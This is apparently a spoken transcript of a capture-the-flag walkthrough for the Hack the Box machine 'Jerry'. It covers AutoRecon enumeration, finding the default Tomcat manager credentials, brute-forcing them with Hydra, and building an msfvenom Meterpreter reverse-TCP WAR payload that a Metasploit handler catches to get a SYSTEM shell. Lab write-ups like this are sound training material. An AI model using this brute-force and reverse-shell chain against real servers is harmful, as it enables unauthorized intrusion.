Hey guys, Awaken Gaming back here with another Hack the Box tutorial. Today we'll be doing the box Jerry. As we can see, it's a Windows based system. The IP address is 10.10.10.95 and we can see it's still pretty easy but definitely getting more difficult. I've already connected to the VPN and today we're going to be talking about a new tool called Auto Recon that I just recently found out about. I'll read the description and then kind of give you my take on exactly what it does. It says, Auto Recon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments. It may also be useful in real-world engagements. The tools work by firstly performing port scans / service detection scans. For those initial results, the tool will launch further enumeration scans for each of these services using a number of different tools. For example, if HTTP is found, Nikto will be launched as well as many others. Everything in this tool is highly configurable. The default configuration performs no automated exploitation to keep the tool in line with OSCP exam rules. If you wish to add automatic exploitation tools to the configuration, you do so at your own risk. The author will not be held responsible for negative actions that result from the misuse of this tool. So basically what it does is it runs an mmap scan, the same one that we normally run, the -SC and -SV, plus a whole lot more. Like, it does more than just that, but basically it finds the port and tries to determine the service running on that port, and then depending on what service it finds, it will launch other tools that will also enumerate specifically for those ports. And so, like, you could run every single one of these commands on your own and not worry about this at all, but it fires them all off in sequence and just makes things a lot easier and quicker for you. So the way that we install this is obviously we have to clone this GitHub, and then we need Python 3 and pip3. Once you have those, you just pip3 install and then -r requirements.txt, and it will install Colorama and Toml for you. And then you also need to install seclists with using this command. And then if you're on a non-Kali Linux based box, you will need to make sure that you have all of these as well, but if you're running Kali Linux, you have all of these pre-installed and configured for you. And that's it for this tool. I'll go and show you how to use it. So we'll CD to where I have it, and then I have it under Auto Recon, and then you would do ./autorecon.py, and then the only argument, well, we can look at the arguments. The only one that's really useful for the most part for us is going to be just supplying it with the IP address. If we had multiple, then we could use a target file to fire off multiple scans on multiple machines at once, but we'll be focusing on one box at a time here, so we'll probably not need that anytime in the near future, at least. So for us, we would ./autorecon.py and then 10.10.10.95, and that would fire away. As we can see here, it's running the service detections using an nmap quick, nmap full TCP, meaning it's scanning every TCP port, and then it's going to run the top 20 UDP ports. And then once it finds stuff, it will keep going, and there's a lot more scans that it does, but I've already done these, so I'm going to go ahead and stop that there so we can CD into our results, and then CD into the 10.10.10.95 folder, and then what we need, which are the scans themselves. Commands.log gives you a complete log of all of the commands that your script ran for you. Errors.log gives you a complete list of all of the errors that it encountered, and then the quick TCP nmap, and it finds port 8080, so it starts running other tools against that port. So here we can see it runs Nikto. Here we can see it gets a grab of our index.html. We can see it runs another mmap command against just port 8080. It looks at robots text, and it runs a WAT web. So just from looking at this, we can already tell that there is a port 8080. So we'll go check that out now. 10.10.10.95 and port 8080. As we can see, this looks to be an Apache Tomcat web server, and it seems like it's running 7.0.88. I'm doing a little bit more enumeration. We don't see, it looks like a fairly fresh installation. I'm going to actually end up showing you guys 3 ways to get this username and password for our initial foothold. So the first way is to cat our TCP nmap, and we can see what all it found just on port 8080. So here we can see that it did indeed find port 8080. Is going to spider the website for us. It finds 3 what it considers interesting URLs, and then we can see all of the paths that it found. So we can see all of these files inside of docs, which are the default Tomcat immediately installs. It's documentation to showing you how to do certain things, so none of those are of any importance to us. So continuing to scroll down past those, we get to some more interesting stuff. So it does a vulnerability scan, doesn't find anything, but it does find a default account inside of our manager HTML, which was that there. It finds Tomcat as the username and secret as the password. And we keep looking through here. It doesn't find anything else really terribly interesting for us, but it does find a lot more information, just nothing that we are particularly interested in. So next we'll take a look at the Nikto and see what it has to say. So it tells us that their anti-click jacking frame is not present, so on and so forth. Nothing really of much interest until we get down here, and it also gives us that username and password. So let's go back here and take a look at Apache. So with that tool, it already showed us the default account twice. So if we click here, if you were to have tried to do something and got to this page, you could also see that it gives you a default command to install the user Tomcat with the password secret, so you could probably infer from that that would be the username and password. But with that being said, I'm going to go ahead and show you guys the third way that we could have gotten into this initial foothold as soon as I clear my history, so that we can get rid of that. There we go. Okay, so now we can see with that we are able to try again, but first we're going to come and copy this and see if it throws us. Okay, cool. So we'll leave that open, and we need to come over here and we'll CD back to our home folder here, and the tool that we're going to be using is called Hydra. So we can type in Hydra -H, and we can see all of our flags that we can use here. So for us, we need the -C, so that way we can input a file, because we're going to use that previously installed sec lists for this. So we need the -C flag, and I believe that is all. So we'll Hydra -C, and then it installs our sec list under users share sec list, and then the one we want is passwords, default passwords, or default credentials rather, and then Tomcat better default pass list.txt, and then HTTP, and we have to give it a type, so a service rather, so we need HTTP get, so HTTP -get / or colon rather /10.10.10.95 port 8080, and then we need the /manager /HTML, and we should be able to fire this away. And here we get that same password again. For whatever reason, Hydra gives us back a false positive here with admin. That does not work, but here again we see Tomcat secret. So we can go ahead and try to log in here. We got Tomcat, and then S3, I believe it was. Yes. S3CRET. And now we get this Tomcat Web Application Manager. And as we can see like some files here. We scroll down, we can deploy things from a server, or we can upload a WAR file here. And WAR file is basically just JavaScript packaged up. So if we come under here under examples, we can see some different things, and we can run those commands and see what they do. And then we can also come in here to the source code and see what they're doing. So usually when you're trying to when you get the opportunity to be able to upload things and then also execute them, it's pretty trivial to get on the box from that point on forward. So we're going to be using a program, let me clear this out right quick, called MSF Venom to craft a package, a WAR file for us that will hopefully get us on the box. So to start with, we'll type in MSF Venom -H so we can get a list of what we need. So -L will list out modules, types of payloads, encounters, NOPs, platforms, so on and so forth. -P, which will definitely be needing -P to set what payload we want. -F will need that to determine what type of file we need it to turn into. And I do believe that's all we need, so let's go ahead and get into crafting this WAR file. So MSF Venom again, and with -P because we want Windows /x64 Meterpreter, and then a reverse TCP, and then we'll set our lhost to be equal to our IP address. So in the interest of not showing everyone what my actual IP address is, I just skipped through looking at that. The command for you should be sudo ifconfig, press enter, and the interface you're looking for is TON0, that stands for tunnel 0. And now we need our L port, so L port, L port, and we need that to be capitalized. L port equals, and this can be anything. We'll just go E. We'll just do 31337, and then we need the -F to set our file type as war, and then -O to set our out file, which we will set to exploit.war. Press this and it should create 2 files for us. It might take a couple of seconds to format them for us. I'll go ahead and skip to when it's finished for you guys. So as we can see here, it created the file for us. So if we do an ls, we can see we have our exploit.war file. So we can come back here to browse here and upload, select war file by upload, and this should be under documents, exploit.war, and we'll click deploy. So now if we look through here, we see our exploit file, and before we execute that, we need to come over here and sudo msf db start. And then we'll go into MSF console itself as well here in a moment, though. Sudo MSF console. So we will use exploit, multi, and handler. So this basically sets up we're basically setting up a handler for this war file to call back to, which will pop our shell on the box. And then we will set the payload to the same we had done before, which was Windows and x64 interpreter, and then it was reverse TCP. And let me get this to go away. There we go. And then we'll show options. We need to set our L host to that again, and then set L port, and then we did elite or 31337, and then show our options again to make sure we have everything set correctly, which we do. So then we'll exploit, and it goes ahead and sets up our reverse handler. We need to unzip that file. And find this. And then browse to that. So we can go here, paste that. Oh, we didn't copy it apparently. Copy selection. Paste that here and then go, and now we have our interpreter session open. Shell, who am I? And we are authority, so we can dir, we can actually control Z, yes, background on that, ls, so that we can use our Linux commands. So we can cd // and then ls, cd into users, ls, cd into admin, ls, and we can cd to the desktop, and we have our flag folder called flags, so cd flags, And then it's named 2 for the price of 1.txt. So from cat 2 for the price of 1.txt, we get both the user and the root text both in the same text file. So that was a pretty interesting box. We were actually able to use a new tool to enumerate, and then we had to craft a malicious war file after finding the credentials in order to log into the web server. If you guys did like this video, please make sure to drop a like and subscription. All your positive feedback and comments help me out a lot. So if you have any questions, please let me know. I will definitely answer anything. So if you didn't understand anything, or you would like me to do a more in-depth video on a specific topic, please let me know down in the comments. And I guess that'll be all for me today. Thank you guys for watching.